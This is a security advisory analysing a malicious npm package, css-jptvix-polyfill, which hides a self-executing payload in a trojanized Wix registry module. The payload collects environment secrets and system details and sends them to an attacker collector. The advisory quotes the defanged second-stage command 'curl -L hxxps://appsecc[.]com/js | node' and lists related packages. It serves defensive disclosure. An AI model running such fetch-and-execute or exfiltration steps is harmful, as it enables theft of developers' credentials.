css-jptvix-polyfill@1.0.0
Malicious code in css-jptvix-polyfill (npm)
Analysis
css-jptvix-polyfill@1.0.0 ships a trojanized copy of the Wix `thunderboltRegistry` module with a self-executing payload injected at the top of package/thunderboltRegistry.js. On require, the payload removes itself from require.cache, then uses child_process.execSync to run `id`, `id -un`/`whoami`, `env` and `ifconfig`/`ip addr`, and sends each result — including the installer's complete environment (all tokens and secrets in the shell) — to the attacker collector at hxxps://orj3tao0ic8oj24h9njymexmtdz5ztphe[.]oastify[.]com/ via fetch(), tagged with the victim's hostname. It then executes a remote second stage with `curl -L hxxps://appsecc[.]com/js | node`, and finally beacons the Node version, platform, PID and timestamp (beacon=rce-poc). The package's index.js is an empty stub, so the payload fires only when the registry module is imported. Network indicators: orj3tao0ic8oj24h9njymexmtdz5ztphe[.]oastify[.]com (HTTPS/443, exfiltration), appsecc[.]com (HTTPS/443, second-stage payload at /js).
- analyzed by
- Leitwacht
- first seen
- Oct 6, 2026, 08:08 AM
- analyzed
- Oct 6, 2026, 12:37 PM
Related advisories
- @worrisome/aaaa@1.0.0
- unreal-horde-dashboard@99999.0.0
- hyperpure@1.0.0
- zomato-server@1.0.0
- hex-conv-ae7a@1.0.0
- vaults-monitor-cron@999.0.0
- css-flow-render-shim@1.0.0
- css-reading-display-polyfill@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.